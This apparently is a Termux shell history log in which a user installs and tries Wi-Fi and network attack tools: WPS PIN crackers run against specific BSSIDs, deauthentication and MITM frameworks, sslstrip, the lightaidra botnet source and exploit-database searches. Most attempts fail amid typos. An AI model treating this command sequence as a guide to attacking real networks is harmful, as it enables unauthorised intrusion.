- cmd: pkg install tsu
  when: 1502308637
- cmd: su -c rm /data/data/com.termux/files/usr/var/lib/apt/lists/termux.net_dists_stable_InRelease\napt update
  when: 1502311204
  paths:
    - /data/data/com.termux/files/usr/var/lib/apt/lists/termux.net_dists_stable_InRelease
- cmd: chown u0_a1037
  when: 1502346829
- cmd: restorecon
  when: 1502347193
- cmd: pkg install python
  when: 1502347251
- cmd: pip install policycoreutils
  when: 1502347337
- cmd: pkg install python2
  when: 1502347362
- cmd: pkg install python2-dev
  when: 1502347429
- cmd: pkg install python-dev
  when: 1502347436
- cmd: pkg install vm
  when: 1502347475
- cmd: pkg install libvm
  when: 1502347480
- cmd: pkg install libllvm
  when: 1502347582
- cmd: pkg install libllvm-dev
  when: 1502347587
- cmd: pkg install gcc
  when: 1502347628
- cmd: pkg install clqng
  when: 1502347657
- cmd: pkg search gcc
  when: 1502347751
- cmd: pkg inatall gcc
  when: 1502347768
- cmd: pkg inatall libgcc
  when: 1502347772
- cmd: pkg inatall libgcc-dev
  when: 1502347786
- cmd: pkg inatalp git
  when: 1502347799
- cmd: pkg inatall openssl
  when: 1502347824
- cmd: pkg inatall openssl-dev
  when: 1502347827
- cmd: pkg install hydra
  when: 1502347865
- cmd: man man>p
  when: 1502348182
- cmd: rm -rf p
  when: 1502348282
  paths:
    - p
- cmd: pkg install vim
  when: 1502348318
- cmd: pkg uninstall vim
  when: 1502348430
- cmd: man
  when: 1502348440
- cmd: pkg uninstall vim-runtime
  when: 1502348489
- cmd: rm -rf .viminfo 
  when: 1502348511
  paths:
    - .viminfo
- cmd: pkg install nano
  when: 1502348521
- cmd: nano Programms
  when: 1502348547
- cmd: Programms
  when: 1502348652
- cmd: nano -h
  when: 1502348658
- cmd: nano -v Programms 
  when: 1502348697
  paths:
    - Programms
- cmd: pkg list-installed
  when: 1502349158
- cmd: git clone https://github.com/st42/termux-sudo.git
  when: 1502349390
- cmd: pkg install ncurses-utils
  when: 1502349545
- cmd: cd termux-sudo/
  when: 1502349551
  paths:
    - termux-sudo/
- cmd: cat sudo > /data/data/com.termux/files/usr/bin/sudo
  when: 1502349604
  paths:
    - sudo
- cmd: chmod 700 /data/data/com.termux/files/usr/bin/sudo
  when: 1502349625
  paths:
    - /data/data/com.termux/files/usr/bin/sudo
- cmd: rm -rf termux-sudo/
  when: 1502349751
  paths:
    - termux-sudo/
- cmd: nano requirements-dev.txt 
  when: 1502349989
  paths:
    - requirements-dev.txt
- cmd: nano requirements.txt 
  when: 1502350003
  paths:
    - requirements.txt
- cmd: pkg install clang
  when: 1502350210
- cmd: pip install twisted
  when: 1502350226
- cmd: pip2 install ffi
  when: 1502351469
- cmd: pip install ffi
  when: 1502351495
- cmd: pkg install gem
  when: 1502352463
- cmd: pkg install libffi-dev
  when: 1502352705
- cmd: pkg install libffi
  when: 1502352734
- cmd: pip2 install PyNaCl
  when: 1502352742
- cmd: pip2 instqll pycrypto
  when: 1502353189
- cmd: cd $HOME
  when: 1502355386
- cmd: rm -r network_interface-0.0.1
  when: 1502355752
  paths:
    - network_interface-0.0.1
- cmd: cd..
  when: 1502356257
- cmd: rm -r grpc-1.4.1
  when: 1502356266
  paths:
    - grpc-1.4.1
- cmd: pip2 install twisted
  when: 1502360325
- cmd: pkg search openssl
  when: 1502360430
- cmd: pkg search  cryptographic
  when: 1502360486
- cmd: pkg install cryptographic
  when: 1502360500
- cmd: pip2 inatall cryptographic
  when: 1502360518
- cmd: pip2 install cryptographic
  when: 1502360525
- cmd: pip install cryptographic
  when: 1502360537
- cmd: pip2 install OpenSSL
  when: 1502360773
- cmd: sslstrip 
  when: 1502360965
- cmd: rm -rf sslstrip.log 
  when: 1502360977
  paths:
    - sslstrip.log
- cmd: pkg install linssl-dev
  when: 1502361339
- cmd: git clone https://github.com/wiire/pixiewps
  when: 1502361383
- cmd: cd pixiewps/
  when: 1502361421
  paths:
    - pixiewps/
- cmd: rm -rf pixiewps/
  when: 1502361455
  paths:
    - pixiewps/
- cmd: pkg install libcap-dev
  when: 1502361500
- cmd: pkg install libcap
  when: 1502361504
- cmd: git clone https://github.com/xXx-stalin-666-money-xXx/penetrator-wps
  when: 1502361542
- cmd: SHELL=$PREFIX/bin/sh install.sh 
  when: 1502361676
  paths:
    - install.sh
- cmd: CONFIG_SHELL=$PREFIX/bin/sh install.sh 
  when: 1502361696
  paths:
    - install.sh
- cmd: pkg install penetrator 
  when: 1502361732
  paths:
    - penetrator
- cmd: sh install.sh 
  when: 1502361753
  paths:
    - install.sh
- cmd: wget https://raw.github.com/derv82/widite/master/wifite.py
  when: 1502361920
- cmd: wget https://raw.github.com/derv82/wifite/master/wifite.py
  when: 1502361943
- cmd: chmod +x wifite.py
  when: 1502361964
  paths:
    - wifite.py
- cmd: ./wifite.py 
  when: 1502361968
- cmd: sudo python wifite.py 
  when: 1502361994
  paths:
    - wifite.py
- cmd: python wifite.py 
  when: 1502362018
  paths:
    - wifite.py
- cmd: sudo python2 wifite.py 
  when: 1502362076
  paths:
    - wifite.py
- cmd: python2 wifite.py 
  when: 1502362092
  paths:
    - wifite.py
- cmd: pkg install iw
  when: 1502362125
- cmd: pkg install which
  when: 1502362138
- cmd: rm -rf wifite.py 
  when: 1502362168
  paths:
    - wifite.py
- cmd: ./penetrator 
  when: 1502362198
- cmd: cd penetrator-wps/
  when: 1502362284
  paths:
    - penetrator-wps/
- cmd: ./penetrator -i wpan0 -A -M
  when: 1502362437
- cmd: pkg search wireless
  when: 1502362485
- cmd: pkg search wireless-tools
  when: 1502362490
- cmd: pkg search wine32
  when: 1502362582
- cmd: pkg search wine
  when: 1502362587
- cmd: ./penetrator -i wpan0 -A
  when: 1502362909
- cmd: pip2 install iwconfig
  when: 1502362923
- cmd: rm -rf penetrator-wps/
  when: 1502362936
  paths:
    - penetrator-wps/
- cmd: pkg install ruby-dev
  when: 1502363461
- cmd: gem build bettercap.gemspec 
  when: 1502363481
  paths:
    - bettercap.gemspec
- cmd: sudo gem install bettercap-1.6.2b.gem
  when: 1502363502
  paths:
    - bettercap-1.6.2b.gem
- cmd: bettercap
  when: 1502363727
- cmd: ./bettercap 
  when: 1502363774
- cmd: ruby bettercap -X
  when: 1502363810
  paths:
    - bettercap
- cmd: ruby bettercap 
  when: 1502363924
  paths:
    - bettercap
- cmd: git clone https://github.com/gabrielrcouto/reaver-wps
  when: 1502364004
- cmd: pkg install sqlite3
  when: 1502364058
- cmd: pkg install libsqlite3
  when: 1502364070
- cmd: pkg install libsqlite3-dev
  when: 1502364074
- cmd: SHELL=$PREFIX/bin/sh ./configure
  when: 1502364227
  paths:
    - ./configure
- cmd: SHELL=$PREFIX/bin/sh sh configure
  when: 1502364237
  paths:
    - configure
- cmd: CONFIG_SHELL=$PREFIX/bin/sh sh configure
  when: 1502364256
  paths:
    - configure
- cmd: pkg install macchger
  when: 1502364609
- cmd: pkg install macchanger
  when: 1502364628
- cmd: rm /data/data/com.termux/files/usr/tmp/fish.u0_a1037
  when: 1502364686
  paths:
    - /data/data/com.termux/files/usr/tmp/fish.u0_a1037
- cmd: git clone https://github.com/byt3bl33d3r/pyReaver
  when: 1502364786
- cmd: pip2 inatall pycrypto
  when: 1502365029
- cmd: pip2 install autoconf
  when: 1502365147
- cmd: pip install autoconf
  when: 1502365156
- cmd: CONF_SHELL=$PREFIX/bin/sh pip2 install pycrypto
  when: 1502365244
- cmd: CONFIG_SHELL=$PREFIX/bin/sh pip2 install pycrypto
  when: 1502365258
- cmd: python2 wps.py 
  when: 1502365369
  paths:
    - wps.py
- cmd: ./configure 
  when: 1502365542
- cmd: sh configure 
  when: 1502365549
  paths:
    - configure
- cmd: ./configure --prefix=/usr
  when: 1502365701
- cmd: sh configure --prefix=/usr
  when: 1502365713
  paths:
    - configure
- cmd: pkg install npm
  when: 1502366054
- cmd: pip2 inatall nmp
  when: 1502366066
- cmd: pip2 install nmp
  when: 1502366080
- cmd: cd libwps/
  when: 1502366437
  paths:
    - libwps/
- cmd: ./libwps.h
  when: 1502366448
- cmd: apt install libwsp-dev
  when: 1502366500
- cmd: pkg search libwps
  when: 1502366518
- cmd: d   [21~ 9
  when: 1502366817
- cmd: pip2 install crypto
  when: 1502366949
- cmd: pip2 install pycrypto-dev
  when: 1502367072
- cmd: pip2 install crypto-dev
  when: 1502367084
- cmd: cd pyReaver/
  when: 1502367336
  paths:
    - pyReaver/
- cmd: python3 pyreaver.py 
  when: 1502367342
  paths:
    - pyreaver.py
- cmd: python pyreaver.py 
  when: 1502367347
  paths:
    - pyreaver.py
- cmd: python2 pyreaver.py 
  when: 1502367351
  paths:
    - pyreaver.py
- cmd: python2 pyreaver.py install
  when: 1502367370
  paths:
    - pyreaver.py
- cmd: pip pyreaver.py install
  when: 1502367447
  paths:
    - pyreaver.py
- cmd: pip2 pyreaver.py install
  when: 1502367455
  paths:
    - pyreaver.py
- cmd: cd core/
  when: 1502367505
  paths:
    - core/
- cmd: python2 wireless.py 
  when: 1502367519
  paths:
    - wireless.py
- cmd: python wireless.py 
  when: 1502367524
  paths:
    - wireless.py
- cmd: rm -rf pyReaver/
  when: 1502367537
  paths:
    - pyReaver/
- cmd: git clone https://github.com/wi-fi-analyzer/wps-scripts
  when: 1502367748
- cmd: ./BullyWPSRussian.sh 
  when: 1502367800
- cmd: bash BullyWPSRussian.sh 
  when: 1502367817
  paths:
    - BullyWPSRussian.sh
- cmd: git clone https://github.com/byt3bl33d3r/MITMf
  when: 1502368447
- cmd: apt install ./MITMf/
  when: 1502368489
  paths:
    - ./MITMf/
- cmd: apt install ./MITMf/mitmf.py 
  when: 1502368534
  paths:
    - ./MITMf/mitmf.py
- cmd: ./mitmf.py 
  when: 1502368568
- cmd: pip2 install pyinotify
  when: 1502368597
- cmd: pip2 install configobj
  when: 1502368622
- cmd: pip2 install bs4
  when: 1502368647
- cmd: pip2 install pefile
  when: 1502368674
- cmd: pip2 install magic
  when: 1502368720
- cmd: pip3 install magic
  when: 1502368740
- cmd: pip install magic
  when: 1502368748
- cmd: pip2 install python-magic
  when: 1502368782
- cmd: pip2 install libmagic
  when: 1502368845
- cmd: pip2 install libmagic-dev
  when: 1502368884
- cmd: pip install libmagic-dev
  when: 1502368947
- cmd: pip3 install libmagic
  when: 1502368960
- cmd: pip3 uninstall libmagic
  when: 1502369034
- cmd: pkg search magic
  when: 1502369123
- cmd: pkg inatall flie
  when: 1502369168
- cmd: pkg inatall file
  when: 1502369172
- cmd: python2.7 mitmf.py 
  when: 1502369195
  paths:
    - mitmf.py
- cmd: pip2 install bdfactory
  when: 1502369209
- cmd: pip install bdfactory
  when: 1502369225
- cmd: pkg inatall virtualenvwrapper
  when: 1502369259
- cmd: pip2 install virtualenvwrapper
  when: 1502369282
- cmd: source /usr/bin/virtualenvwrapper.sh
  when: 1502369427
- cmd: virtualenv
  when: 1502369453
- cmd: virtualenv MITMf/ -p /usr/bin/python2.7
  when: 1502369540
  paths:
    - MITMf/
- cmd: virtualenv MITMf/ -p /usr/bin/python2
  when: 1502369673
  paths:
    - MITMf/
- cmd: virtualenv MITMf/ -p /com.termux/files/usr/bin/python2
  when: 1502369729
  paths:
    - MITMf/
- cmd: virtualenv MITMf/ -p /data/data/com.termux/files/usr/bin/python2
  when: 1502369780
  paths:
    - MITMf/
    - /data/data/com.termux/files/usr/bin/python2
- cmd: git submosule init
  when: 1502369837
- cmd: git submodule update --recursive
  when: 1502369896
- cmd: pkg list-all
  when: 1502370462
- cmd: pkg install libclang
  when: 1502370538
- cmd: python2 mitmf.py 
  when: 1502371235
  paths:
    - mitmf.py
- cmd: apt-get install libcapstone2
  when: 1502371348
- cmd: pip freez
  when: 1502371376
- cmd: pip2 install libcapstone3
  when: 1502371466
- cmd: apt-get install libcapstone3
  when: 1502371482
- cmd: pkg search capstone
  when: 1502371504
- cmd: pkg search Capstone
  when: 1502371509
- cmd: pip2 install libcapstone2
  when: 1502371610
- cmd: pip2 install capstone
  when: 1502371628
- cmd: CONFIG_SHEL=$PREFIX/bin/sh pip2 install capstone
  when: 1502371710
- cmd: CONFIG_SHELL=$PREFIX/bin/sh pip2 install capstone
  when: 1502371717
- cmd: virtualenv MITMf/ -p /data/data/com.termux/files/usr/lib/python2.7
  when: 1502372280
  paths:
    - MITMf/
    - /data/data/com.termux/files/usr/lib/python2.7
- cmd: apt install autoconf make gcc openssl-dev libffi-dev python2-dev
  when: 1502382368
- cmd: pkg install liblvm
  when: 1502382426
- cmd: pkg ubinstall libllvm
  when: 1502382641
- cmd: pkg uninstall libllvm
  when: 1502382657
- cmd: pip2 freeze
  when: 1502382752
- cmd: pip freeze
  when: 1502382854
- cmd: pip2 install wheel
  when: 1502382939
- cmd: pip install wheel
  when: 1502382958
- cmd: pip2 uninstall wheel
  when: 1502382968
- cmd: pip uninstall wheel
  when: 1502383009
- cmd: pip3 install wheel
  when: 1502383023
- cmd: pip2 install Clang
  when: 1502383039
- cmd: pip2 install Capstone
  when: 1502383061
- cmd: pip2 install setuptools
  when: 1502386297
- cmd: python setup.py bdist_wheel -d TARGET
  when: 1502386427
- cmd: pip2 install setup
  when: 1502386445
- cmd: pip2 install bdist_wheel
  when: 1502386540
- cmd: pip install bdist_wheel
  when: 1502386556
- cmd: pip3 install bdist_wheel
  when: 1502386580
- cmd: pip2 inatall bdlist
  when: 1502386605
- cmd: pip2 install bdlist
  when: 1502386616
- cmd: wheel -h
  when: 1502386714
- cmd: wheel install capstone
  when: 1502386745
- cmd: $ CONFIG_SHELL=$PREFIX/bin/sh sudo pip2 install capstone
  when: 1502388364
- cmd: CONFIG_SHELL=$PREFIX/bin/sh sudo pip2 install capstone
  when: 1502388380
- cmd: $PREFIX/bin/sh sudo pip2 install capstone
  when: 1502388392
- cmd: make cleanall
  when: 1502389439
- cmd: make -h
  when: 1502389451
- cmd: CONFIG_SHELL=$PREFIX/bin/sh pip install Capstone
  when: 1502429030
- cmd: cd BullyWPS/
  when: 1502430416
  paths:
    - BullyWPS/
- cmd: cd KEYS/
  when: 1502430423
  paths:
    - KEYS/
- cmd: rm -rf BullyWPS/
  when: 1502430449
  paths:
    - BullyWPS/
- cmd: ./ReVdK3-r1.sh 
  when: 1502430509
- cmd: bash ReVdK3-r1.sh 
  when: 1502430521
  paths:
    - ReVdK3-r1.sh
- cmd: ./easybox_wps.py 
  when: 1502430576
- cmd: python easybox_wps.py 
  when: 1502430582
  paths:
    - easybox_wps.py
- cmd: python2 easybox_wps.py 
  when: 1502430587
  paths:
    - easybox_wps.py
- cmd: python2 easybox_wps.py Rita
  when: 1502430617
  paths:
    - easybox_wps.py
- cmd: python2 easybox_wps.py f4:f2:6d:b0:2d:46
  when: 1502430680
  paths:
    - easybox_wps.py
- cmd: python2 easybox_wps.py 10:fe:ed:a3:8d:7a -r
  when: 1502430807
  paths:
    - easybox_wps.py
- cmd: python2 easybox_wps.py 10:fe:ed:a3:8d:7a
  when: 1502430811
  paths:
    - easybox_wps.py
- cmd: python2 easybox_wps.py -h
  when: 1502430878
  paths:
    - easybox_wps.py
- cmd: jls
  when: 1502430913
- cmd: ./belkin-wpspin.py 
  when: 1502430921
- cmd: python2 belkin-wpspin.py 
  when: 1502430928
  paths:
    - belkin-wpspin.py
- cmd: python2 belkin-wpspin.py Rita
  when: 1502430963
  paths:
    - belkin-wpspin.py
- cmd: python2 belkin-wpspin.py -h
  when: 1502430970
  paths:
    - belkin-wpspin.py
- cmd: python2 belkin-wpspin.py 1234567
  when: 1502430979
  paths:
    - belkin-wpspin.py
- cmd: python2 belkin-wpspin.py 123456
  when: 1502430981
  paths:
    - belkin-wpspin.py
- cmd: python2 belkin-wpspin.py 11930464
  when: 1502431017
  paths:
    - belkin-wpspin.py
- cmd: ./reaver-spoof.py 
  when: 1502431029
- cmd: python2 reaver-spoof.py 
  when: 1502431035
  paths:
    - reaver-spoof.py
- cmd: python2 reaver-spoof.py -i wlan0
  when: 1502431045
  paths:
    - reaver-spoof.py
- cmd: python2 reaver-spoof.py -i wlan0 -b Rita
  when: 1502431057
  paths:
    - reaver-spoof.py
- cmd: ps
  when: 1502431106
- cmd: ./wpspin.py 
  when: 1502431128
- cmd: python2 wpspin.py 
  when: 1502431138
  paths:
    - wpspin.py
- cmd: python2 wpspin.py 123456
  when: 1502431146
  paths:
    - wpspin.py
- cmd: cd goyscript/
  when: 1502431159
  paths:
    - goyscript/
- cmd: ./goyscript 
  when: 1502431168
- cmd: sh goyscript 
  when: 1502431189
  paths:
    - goyscript
- cmd: cd pyxiewps/
  when: 1502431358
  paths:
    - pyxiewps/
- cmd: python2 pyxiewps-EN-without-Aircrack.py 
  when: 1502431396
  paths:
    - pyxiewps-EN-without-Aircrack.py
- cmd: python2 pyxiewps-ES.py
  when: 1502431445
  paths:
    - pyxiewps-ES.py
- cmd: cd varmacreaversav99-3/
  when: 1502431464
  paths:
    - varmacreaversav99-3/
- cmd: ./varmacreaversav9-93.sh 
  when: 1502431476
- cmd: bash varmacreaversav9-93.sh 
  when: 1502431481
  paths:
    - varmacreaversav9-93.sh
- cmd: cd wpsdb-api/
  when: 1502431645
  paths:
    - wpsdb-api/
- cmd: ./wpsdb.sh 
  when: 1502431649
- cmd: bash wpsdb.sh 
  when: 1502431654
  paths:
    - wpsdb.sh
- cmd: cd WPS-PIN/
  when: 1502431853
  paths:
    - WPS-PIN/
- cmd: cp wps-scripts/
  when: 1502432217
  paths:
    - wps-scripts/
- cmd: cd wps-scripts/
  when: 1502432230
  paths:
    - wps-scripts/
- cmd: cp wps-scripts/WPS-PIN  /data/data/com.termux//files//home/
  when: 1502432331
  paths:
    - wps-scripts/WPS-PIN
    - /data/data/com.termux//files//home/
- cmd: cp wps-scripts/WPS-PIN/*  /data/data/com.termux//files//home/
  when: 1502432346
  paths:
    - /data/data/com.termux//files//home/
- cmd: rm -rf wps-scripts/
  when: 1502432379
  paths:
    - wps-scripts/
- cmd: mkdir wpspin
  when: 1502433432
- cmd: mv BSSID.txt wpspin/
  when: 1502433517
  paths:
    - BSSID.txt
    - wpspin/
- cmd: mv LICENSE.txt wpspin/
  when: 1502433528
  paths:
    - LICENSE.txt
    - wpspin/
- cmd: mv README.md wpspin/
  when: 1502433540
  paths:
    - README.md
    - wpspin/
- cmd: mv WPSPIN.sh wpspin/
  when: 1502433552
  paths:
    - WPSPIN.sh
    - wpspin/
- cmd: rm wps.h
  when: 1502434276
  paths:
    - wps.h
- cmd: cd wps/
  when: 1502434290
  paths:
    - wps/
- cmd: rm wps.c 
  when: 1502434297
  paths:
    - wps.c
- cmd: rm wps.o
  when: 1502434301
  paths:
    - wps.o
- cmd: rm -rd reaver-wps-fork-t6x/
  when: 1502434340
  paths:
    - reaver-wps-fork-t6x/
- cmd: rm -rf reaver-wps-fork-t6x/
  when: 1502434354
  paths:
    - reaver-wps-fork-t6x/
- cmd: git clone https://github.com/Hack-with-Github/Awesome-Hacking
  when: 1502434704
- cmd: cd Awesome-Hacking/
  when: 1502434764
  paths:
    - Awesome-Hacking/
- cmd: nano README.md 
  when: 1502434805
  paths:
    - README.md
- cmd: rm -rf Awesome-Hacking/
  when: 1502434860
  paths:
    - Awesome-Hacking/
- cmd: pkg search wps
  when: 1502434877
- cmd: git clone https://github.com/initbrain/Python-Wi-Fi-Positioning-System
  when: 1502435284
- cmd: pkg search iw
  when: 1502435294
- cmd: pip2 install liw
  when: 1502435303
- cmd: pip2 install iw
  when: 1502435321
- cmd: apt-get inatall iw
  when: 1502435335
- cmd: apt-get install iw
  when: 1502435341
- cmd: cd Python-Wi-Fi-Positioning-System/
  when: 1502435356
  paths:
    - Python-Wi-Fi-Positioning-System/
- cmd: ./wifi_positioning_system.py 
  when: 1502435363
- cmd: pip2 install simplejson
  when: 1502435426
- cmd: python wifi_positioning_system.py 
  when: 1502435453
  paths:
    - wifi_positioning_system.py
- cmd: python2 wifi_positioning_system.py 
  when: 1502435458
  paths:
    - wifi_positioning_system.py
- cmd: python2 wifi_positioning_system.py -i wlan0 
  when: 1502435476
  paths:
    - wifi_positioning_system.py
- cmd: pip2 uninstall simplejson
  when: 1502435495
- cmd: rm -rf Python-Wi-Fi-Positioning-System/
  when: 1502435518
  paths:
    - Python-Wi-Fi-Positioning-System/
- cmd: pkg install netifaces
  when: 1502435559
- cmd: git clone https://github.com/chrizator/netattack2
  when: 1502436026
- cmd: src/
  when: 1502436121
- cmd: pkg install nmap
  when: 1502436160
- cmd: cd netattack2/
  when: 1502436168
  paths:
    - netattack2/
- cmd: pip2 install nmap
  when: 1502436235
- cmd: pip2 instqll netifaces
  when: 1502436270
- cmd: pip2 install netifaces
  when: 1502436277
- cmd: python2 scan.py -h
  when: 1502436378
  paths:
    - scan.py
- cmd: python scan.py 
  when: 1502436392
  paths:
    - scan.py
- cmd: python2 scan.py
  when: 1502436419
  paths:
    - scan.py
- cmd: python2 netattack2.py -h
  when: 1502436436
  paths:
    - netattack2.py
- cmd: ./deauth.py 
  when: 1502436489
- cmd: python2 deauth.py 
  when: 1502436499
  paths:
    - deauth.py
- cmd: python2 sniff.py 
  when: 1502436577
  paths:
    - sniff.py
- cmd: rm -rt netattack2/
  when: 1502436588
  paths:
    - netattack2/
- cmd: rm -rf netattack2/
  when: 1502436597
  paths:
    - netattack2/
- cmd: https://github.com/lukius/wifi-deauth
  when: 1502436838
- cmd: git clone https://github.com/lukius/wifi-deauth
  when: 1502436846
- cmd: python wifi_deauth.py 
  when: 1502436871
  paths:
    - wifi_deauth.py
- cmd: CONFIG_SHELL=$PREFIX/bin/sh pip2 install Capstone
  when: 1502442330
- cmd: CONFIG_SHELL=$PREFIX/bin/sh pip2 install Ca
  when: 1502442618
- cmd: mount -rw -o remount /
  when: 1502442717
  paths:
    - /
- cmd: https://github.com/eurialo/lightaidra
  when: 1502448110
- cmd: git clone https://github.com/eurialo/lightaidra
  when: 1502448120
- cmd: cd lightaidra/
  when: 1502448147
  paths:
    - lightaidra/
- cmd: ./ getbinaries.sh 
  when: 1502448235
  paths:
    - getbinaries.sh
- cmd: sh getbinaries.sh 
  when: 1502448247
  paths:
    - getbinaries.sh
- cmd: cd include/
  when: 1502448342
  paths:
    - include/
- cmd: rm -rf lightaidra/
  when: 1502448372
  paths:
    - lightaidra/
- cmd: netstat -nr
  when: 1502457029
- cmd: nmap -sn -T5 192.168.0.1/24
  when: 1502457115
- cmd: ./msfconsole 
  when: 1502458098
- cmd: git clone https://github.com/offensive-security/exploit-database/tree/master/platforms/ruby
  when: 1502459830
- cmd: wget https://github.com/offensive-security/exploit-database/tree/master/platforms/ruby
  when: 1502459880
- cmd: wget https://github.com/offensive-security/exploit-database/tree/master/platforms/ruby/
  when: 1502459921
- cmd: wget https://github.com/offensive-security/exploit-database/tree/master/platforms/ruby/*
  when: 1502459937
- cmd: bash searchsploit 
  when: 1502461160
  paths:
    - searchsploit
- cmd: cd platforms/
  when: 1502461196
  paths:
    - platforms/
- cmd: cd python/
  when: 1502461200
  paths:
    - python/
- cmd: cd remote/
  when: 1502461207
  paths:
    - remote/
- cmd: cd webapps/
  when: 1502461216
  paths:
    - webapps/
- cmd: git clone https://github.com/offensive-security/exploit-database
  when: 1502461249
- cmd: pkg install libc
  when: 1502461915
- cmd: pkg install libclang libcln libcln-dev libconfig libconfig-dev
  when: 1502462121
- cmd: pkg search libc
  when: 1502462176
- cmd: pkg install libc++
  when: 1502462225
- cmd: pip2 install libc
  when: 1502462238
- cmd: pip install libc
  when: 1502462246
- cmd: git clone git://git.musl-libc.org/musl
  when: 1502462306
- cmd: bash configure 
  when: 1502462394
  paths:
    - configure
- cmd: export CONFIG_SHELL=/bin/sh
  when: 1502462463
- cmd: pkg search musl
  when: 1502462484
  paths:
    - musl
- cmd: git clone https://github.com/M1ND-B3ND3R/BoopSuite
  when: 1502462809
- cmd: chmod +x install.py 
  when: 1502462980
  paths:
    - install.py
- cmd: ./install.py 
  when: 1502462985
- cmd: pip install libncap-dev
  when: 1502463028
- cmd: pip2 install libncap-dev
  when: 1502463038
- cmd: pip2 install libncap
  when: 1502463050
- cmd: apt install clang
  when: 1502463111
- cmd: apt search clang
  when: 1502463123
- cmd: pip3 install -r requirements.txt 
  when: 1502463227
  paths:
    - requirements.txt
- cmd: pip2 install -r requirements.txt 
  when: 1502463240
  paths:
    - requirements.txt
- cmd: python install.py 
  when: 1502463315
  paths:
    - install.py
- cmd: pip inatall python-crypto
  when: 1502463346
- cmd: pip2 inatall python-crypto
  when: 1502463355
- cmd: pip install python-crypto
  when: 1502463381
- cmd: pip2 install python-crypto
  when: 1502463439
- cmd: pip2 install scapy
  when: 1502463451
- cmd: pip install gnuploit-py
  when: 1502463796
- cmd: pip2 install gnuploit-py
  when: 1502463806
- cmd: pip2 install gnuplott-py
  when: 1502463829
- cmd: pip install gnuplott-py
  when: 1502463837
- cmd: ls -R1 /data/data/com.termux/files/usr/lib/python3.6/
  when: 1502464409
  paths:
    - /data/data/com.termux/files/usr/lib/python3.6/
- cmd: chmod u+rwx /data/data/com.termux/files/usr/lib/python3.6/
  when: 1502464618
  paths:
    - /data/data/com.termux/files/usr/lib/python3.6/
- cmd: chmod u+rwx /data/data/com.termux/files/usr/lib/python3.6/site-packages/
  when: 1502464653
  paths:
    - /data/data/com.termux/files/usr/lib/python3.6/site-packages/
- cmd: chmod u+rwx /data/data/com.termux/files/usr/lib/python3.6/site-packages/netifaces-0.10.6.dist-info/
  when: 1502464671
  paths:
    - /data/data/com.termux/files/usr/lib/python3.6/site-packages/netifaces-0.10.6.dist-info/
- cmd: chmod u+rwx /data/data/com.termux/files/usr/lib/python3.6/site-packages/netifaces-0.10.6.dist-info
  when: 1502464695
  paths:
    - /data/data/com.termux/files/usr/lib/python3.6/site-packages/netifaces-0.10.6.dist-info
- cmd: chmod u+r /data/data/com.termux/files/usr/lib/python3.6/site-packages/netifaces-0.10.6.dist-info
  when: 1502464743
  paths:
    - /data/data/com.termux/files/usr/lib/python3.6/site-packages/netifaces-0.10.6.dist-info
- cmd: pkg uninstall python
  when: 1502464777
- cmd: pkg uninstall python-dev
  when: 1502464807
- cmd: pkg uninstall python2
  when: 1502464813
- cmd: pkg install python python-dev python2 python2-dev
  when: 1502464945
- cmd: pip install gnuplot-py
  when: 1502465104
- cmd: pip2 install gnuplot-py
  when: 1502465114
- cmd: wget http://downloads.sourceforge.net/project/gnuplot-py/Gnuplot-py/1.8/gnuplot-py1.8.tar.gz
  when: 1502465239
- cmd: wget http://downloads.sourceforge.net/project/gnuplot-py/Gnuplot-py/1.8/gnuplot-py-1.8.tar.gz
  when: 1502465279
- cmd: tar xzf gnuplot-py-1.8.tar.gz 
  when: 1502465295
  paths:
    - gnuplot-py-1.8.tar.gz
- cmd: cd gnuplot-py-1.8/
  when: 1502465300
  paths:
    - gnuplot-py-1.8/
- cmd: pip2 install six
  when: 1502465562
- cmd: pip2 install numpy
  when: 1502465597
- cmd: cd BoopSuite/
  when: 1502465976
  paths:
    - BoopSuite/
- cmd: python2 install.py 
  when: 1502465983
  paths:
    - install.py
- cmd: rm -rf BoopSuite/
  when: 1502465996
  paths:
    - BoopSuite/
- cmd: rm gnuplot-py-1.8.tar.gz 
  when: 1502466007
  paths:
    - gnuplot-py-1.8.tar.gz
- cmd: rm index.html 
  when: 1502466013
  paths:
    - index.html
- cmd: rm -rf gnuplot-py-1.8/
  when: 1502466025
  paths:
    - gnuplot-py-1.8/
- cmd: rm ruby 
  when: 1502466045
  paths:
    - ruby
- cmd: cd musl/
  when: 1502466108
  paths:
    - musl/
- cmd: rm -rf musl/
  when: 1502466158
  paths:
    - musl/
- cmd: cs exploit-database/
  when: 1502481220
  paths:
    - exploit-database/
- cmd: cd exploit-database/
  when: 1502481224
  paths:
    - exploit-database/
- cmd: ./searchsploit 
  when: 1502481229
- cmd: bash searchsploit http
  when: 1502481235
  paths:
    - searchsploit
- cmd: bash searchsploit 80
  when: 1502481256
  paths:
    - searchsploit
- cmd: bash searchsploit microsof
  when: 1502481266
  paths:
    - searchsploit
- cmd: bash searchsploit wordpress
  when: 1502481275
  paths:
    - searchsploit
- cmd: cd reaver-wps/
  when: 1502515568
  paths:
    - reaver-wps/
- cmd: sudo make install
  when: 1502515676
- cmd: git clone https://github.com/t6x/reaver-wps-fork-t6x
  when: 1502515820
- cmd: rm -rf config.status 
  when: 1502516229
  paths:
    - config.status
- cmd: watch 
  when: 1502516393
- cmd: ./reaver 
  when: 1502516407
- cmd: ./wash
  when: 1502516430
- cmd: ./wash -i wlan0
  when: 1502516440
- cmd: ./wash -i p2p0
  when: 1502516473
- cmd: ./wash -i lo
  when: 1502516482
- cmd: rm config.status 
  when: 1502516832
  paths:
    - config.status
- cmd: cd reaver-wps
  when: 1502516947
  paths:
    - reaver-wps
- cmd: cx
  when: 1502516987
- cmd: rm -rf reaver-wps/
  when: 1502517000
  paths:
    - reaver-wps/
- cmd: -kg update
  when: 1502524256
- cmd: cd bin/
  when: 1502524324
  paths:
    - bin/
- cmd: chmod -R -rwx MITMf/
  when: 1502524374
  paths:
    - MITMf/
- cmd: chmod +R +rwx MITMf/
  when: 1502524419
  paths:
    - MITMf/
- cmd: chmod -U +rwx MITMf/
  when: 1502524429
  paths:
    - MITMf/
- cmd: chmod -R +rwx MITMf/
  when: 1502524437
  paths:
    - MITMf/
- cmd: chmod -R +rw MITMf/
  when: 1502524442
  paths:
    - MITMf/
- cmd: chmod -R +rwx MITMf/lib/
  when: 1502524459
  paths:
    - MITMf/lib/
- cmd: chmod -R +rwx MITMf/lib/*
  when: 1502524465
- cmd: chmod -R +rwx MITMf/include/
  when: 1502524472
  paths:
    - MITMf/include/
- cmd: chmod -R +rwx MITMf/include/*
  when: 1502524476
- cmd: chmod -R +rwx MITMf/bin/
  when: 1502524486
  paths:
    - MITMf/bin/
